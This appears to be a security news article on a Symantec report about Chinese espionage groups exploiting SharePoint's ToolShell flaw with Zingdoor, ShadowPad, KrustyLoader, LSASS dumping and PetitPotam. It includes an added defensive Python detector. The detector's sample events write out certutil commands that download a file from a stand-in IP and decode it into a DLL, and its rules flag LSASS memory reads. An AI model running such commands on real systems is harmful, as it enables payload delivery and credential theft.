Symantec’s investigation uncovered a complex web of interconnected Chinese espionage operations, with infrastructure and tooling overlapping multiple threat clusters.
The team observed the Zingdoor backdoor, ShadowPad Trojan, and KrustyLoader malware families deployed across victims — all tools previously associated with Glowworm (aka Earth Estries, FamousSparrow) and UNC5221, two Chinese state-linked APT groups.
“Zingdoor, which was deployed on the networks of all three organizations, has in the past been associated with the Chinese group Glowworm,” Symantec noted. “Another tool used in this campaign, KrustyLoader, has also previously been linked to activity by a group called UNC5221, which has been described as a China-nexus group.”
The campaign also saw attackers compromise two South American government agencies and a U.S. university, using SQL Server and Apache HTTP Server vulnerabilities as alternate entry points. In these cases the malicious DLL was sideloaded by a legitimate BugSplat binary renamed mantec.exe, a name chosen to pass as Symantec software and evade detection.
The attackers relied on a sophisticated, modular toolkit to maintain persistence and execute commands within target environments.
- Zingdoor Backdoor: An HTTP backdoor written in Go, Zingdoor can collect system data, upload and download files, and execute arbitrary commands. It was first seen in 2023 and has since become a staple of Chinese espionage operations. In this campaign it was sideloaded by a legitimate Trend Micro binary to blend in with corporate environments.
- ShadowPad Trojan: Deployed alongside Zingdoor, ShadowPad is a modular remote access Trojan (RAT) used by several Chinese APTs including APT41, Blackfly, and Grayfly. It is typically loaded via DLL sideloading for stealth and can dynamically download new modules to extend its functionality. “ShadowPad is a modular remote access Trojan closely associated with China-based APT groups,” Symantec explained. Its modular design allows it to be updated continuously with new capabilities, making it a powerful espionage tool.
- KrustyLoader Dropper: On July 25, 2025, attackers deployed KrustyLoader, a Rust-based loader that performs anti-analysis checks and self-deletion, before downloading second-stage payloads — including the Sliver C2 framework. “KrustyLoader was first documented in January 2024,” Symantec stated. “It is written in Rust and designed to deliver a second-stage payload. Its previous activity has been linked to China-based threat actors and the Sliver post-exploitation framework.”
Beyond bespoke malware, the attackers heavily used publicly available and native Windows tools for stealth and persistence, including:
- Certutil – to decode or download files;
- GoGo Scanner – for reconnaissance;
- Revsocks – as a SOCKS5 proxy;
- Procdump, Minidump, and LsassDumper – to dump LSASS memory and extract credentials.
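The living-off-the-land tools above leave recognisable traces in endpoint telemetry. The following is an added detection example, not Symantec's tooling or anything from the report: it runs two simple rules over constructed Sysmon-style events (Event ID 1 process creation and Event ID 10 process access), flagging certutil invoked with download or decode switches and any non-allowlisted process that opens lsass.exe with PROCESS_VM_READ. The sample events, the allowlist, and the field names are assumptions for illustration; real Sysmon fields and benign LSASS readers vary by estate.

```python
"""Toy detections for the tradecraft listed above (added example, not the
report's own tooling). Events are hand-constructed to resemble Sysmon
Event ID 1 (process create) and Event ID 10 (process access) fields."""
import re

# PROCESS_VM_READ bit of the Windows process access mask; credential
# dumpers need it to read LSASS memory.
PROCESS_VM_READ = 0x0010

# Hypothetical allowlist of processes that legitimately touch LSASS;
# tune this to the estate rather than copying it.
LSASS_ACCESS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# certutil switches commonly abused to fetch or decode payloads.
CERTUTIL_ABUSE = re.compile(r"\s-(urlcache|decode|decodehex|encode)\b", re.IGNORECASE)

# Constructed sample events (not real telemetry).
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -urlcache -split -f http://203.0.113.7/x.dat C:\Users\Public\x.dat"},
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -decode C:\Users\Public\x.b64 C:\Users\Public\x.dll"},
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "cmd": "certutil -verify server.cer"},                      # benign admin use
    {"id": 10, "source": r"C:\Temp\procdump64.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1FFFFF"},
    {"id": 10, "source": r"C:\Windows\System32\csrss.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": "0x1400"},  # benign, no VM_READ
]


def check_process_create(ev):
    """Rule 1: certutil used as a downloader or decoder."""
    if ev["image"].lower().endswith("\\certutil.exe") and CERTUTIL_ABUSE.search(ev["cmd"]):
        return "certutil used to download or decode a file"
    return None


def check_process_access(ev):
    """Rule 2: non-allowlisted process opens LSASS with VM_READ."""
    if not ev["target"].lower().endswith("\\lsass.exe"):
        return None
    if ev["source"].lower() in LSASS_ACCESS_ALLOWLIST:
        return None
    if int(ev["access"], 16) & PROCESS_VM_READ:
        return "non-allowlisted process opened LSASS with PROCESS_VM_READ"
    return None


def detect(events):
    """Return (event_id, reason) for every event that trips a rule."""
    hits = []
    for ev in events:
        if ev["id"] == 1:
            msg = check_process_create(ev)
        elif ev["id"] == 10:
            msg = check_process_access(ev)
        else:
            msg = None
        if msg:
            hits.append((ev["id"], msg))
    return hits


if __name__ == "__main__":
    for event_id, reason in detect(EVENTS):
        print(f"Event {event_id}: {reason}")
```

Against the constructed events this yields three hits: the two certutil download/decode invocations and the procdump access to LSASS, while the `-verify` call and the csrss.exe access (which lacks PROCESS_VM_READ) pass. The access-mask check matters in practice: alerting on every LSASS open is noisy, whereas VM_READ from an unexpected image is rare.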
They also used PetitPotam (CVE-2021-36942, Microsoft's "Windows LSA Spoofing" advisory), an NTLM authentication-coercion technique that abuses the MS-EFSRPC interface to make a domain controller authenticate to an attacker-controlled host; the coerced authentication can then be relayed to obtain credentials and escalate to control of the domain.
“PetitPotam is an exploitation technique that allows a threat actor within a compromised network to steal credentials and authentication information from Windows Servers to gain full control of the domain,” Symantec detailed.
The investigation revealed that ToolShell’s exploitation extended far beyond the three groups Microsoft initially identified — Budworm (Linen Typhoon), Sheathminer (Violet Typhoon), and Storm-2603 — indicating an even broader Chinese operational ecosystem.
“These attacks demonstrate that the ToolShell vulnerability was being exploited by an even wider range of Chinese threat actors than was originally thought,” Symantec concluded.
The researchers found evidence of mass scanning for vulnerable SharePoint servers, followed by selective intrusion into targets of strategic interest, suggesting a coordinated espionage campaign aimed at data theft and long-term access.
“The activity carried out on targeted networks indicates that the attackers were interested in stealing credentials and in establishing persistent and stealthy access to victim networks, likely for the purpose of espionage,” the report said.